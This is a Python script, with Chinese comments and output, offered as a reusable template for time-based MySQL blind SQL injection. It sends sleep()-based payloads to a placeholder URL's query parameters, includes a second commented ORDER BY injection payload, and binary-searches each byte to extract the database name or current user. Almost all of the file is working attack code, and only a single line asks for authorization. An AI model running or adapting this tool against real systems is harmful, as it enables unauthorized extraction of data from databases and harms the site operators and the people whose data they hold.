几次mysql盲注中抽出来的盲注模板
import requests
import time
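# Time-based (sleep()) MySQL blind-injection template. The oracle is one bit per
# request: "is byte N of the target string greater than T?", answered by whether
# the response took longer than the injected sleep. Use only against systems you
# are authorized to test.
time_conf = 1  # seconds the injected sleep() runs; a mean response time above this reads as "true"
REQUEST_TIMEOUT = 3 * time_conf  # per-request bound: longer than the sleep, but a hung server cannot stall the scan
SAMPLES = 3  # requests per probe, averaged so a single jittery response does not flip a bit
MAX_LENGTH = 39  # positions probed (the original looped range(1, 40))
LOW, HIGH = 1, 250  # search bounds for the byte value returned by MySQL ascii()


def build_url(position: int, threshold: int) -> str:
    """Return the probe URL asking whether byte *position* of database() is greater than *threshold*.

    The payload is spliced straight into the query string, so the comparison
    operator is pre-encoded (``%3e`` is ``>``); requests does not re-encode it.
    NOTE: the target this was written against cut the backend call after roughly
    one second, so the injected sleep() only ever adds about a second -- keep
    ``time_conf`` at 1 for that case.
    """
    # Alternate payload seen on another target (ORDER BY injection via a subquery):
    #   f"https://example.com?pageNo=1&pageSize=5&orderBy=desc,"
    #   f"(select*from(select+sleep("
    #   f"if((ascii(substr(user(),{position},1))%3e{threshold}),sleep({time_conf}),1)"
    #   f")union/**/select+1)a)"
    return (
        f"https://example.com?userId=130"
        f"/**/or/**/1=1/**/and/**/"
        f"if((ascii(substr(database(),{position},1))%3e{threshold}),sleep({time_conf}),1=2)"
        f"&phone=18888888888"
    )


def measure_probe(url: str, samples: int = SAMPLES) -> float:
    """Return the mean wall-clock seconds of *samples* GET requests to *url*.

    Each request is bounded by ``REQUEST_TIMEOUT``; a request that times out still
    counts with its full elapsed time, so it reads as "slow" -- the safe reading
    for a sleep() oracle. Other network errors propagate instead of being mistaken
    for a fast (i.e. "false") response, which would silently corrupt the result.
    """
    total = 0.0
    for _ in range(samples):
        start = time.monotonic()  # monotonic: a wall-clock adjustment must not skew the timing oracle
        try:
            requests.get(url, timeout=REQUEST_TIMEOUT)
        except requests.exceptions.Timeout:
            pass  # elapsed time is already past the threshold; treat as "true"
        total += time.monotonic() - start
    return total / samples


def byte_is_greater(position: int, threshold: int) -> bool:
    """Time-based oracle: True when byte *position* of database() is greater than *threshold*."""
    return measure_probe(build_url(position, threshold)) > time_conf


def search_byte(is_greater, low: int = LOW, high: int = HIGH) -> int:
    """Binary-search a byte value with the boolean oracle ``is_greater(threshold)``.

    Returns *low* when the value is at or below *low* (for example ascii('') == 0
    once substr() runs past the end of the string) and *high* when it is above
    ``high - 1``; callers treat both bounds as stop sentinels.
    """
    while high - low > 1:
        mid = (low + high) // 2
        print("间距 ", low, high)
        if is_greater(mid):
            low = mid
        else:
            high = mid
    # Gap of one: a final probe on *low* decides between the two candidates.
    print("间距 ", low, high)
    return high if is_greater(low) else low


def extract(is_greater, max_length: int = MAX_LENGTH) -> str:
    """Recover up to *max_length* bytes, one binary search per position, stopping at a sentinel.

    *is_greater(position, threshold)* is the oracle; ``byte_is_greater`` is the
    network-backed one, but any callable works (handy for dry runs).
    """
    results = ""
    for position in range(1, max_length + 1):
        print("当前判断位数 ", position)
        value = search_byte(lambda threshold, position=position: is_greater(position, threshold))
        print("字符=>", chr(value), " ASCII=>", value)
        if value in (LOW, HIGH):
            break  # LOW: past the end of the string; HIGH: hit the search bound, not a usable byte
        results += chr(value)
        print("当前结果=>", results)
    return results


if __name__ == "__main__":
    results = extract(byte_is_greater)
    print("结果=>", results)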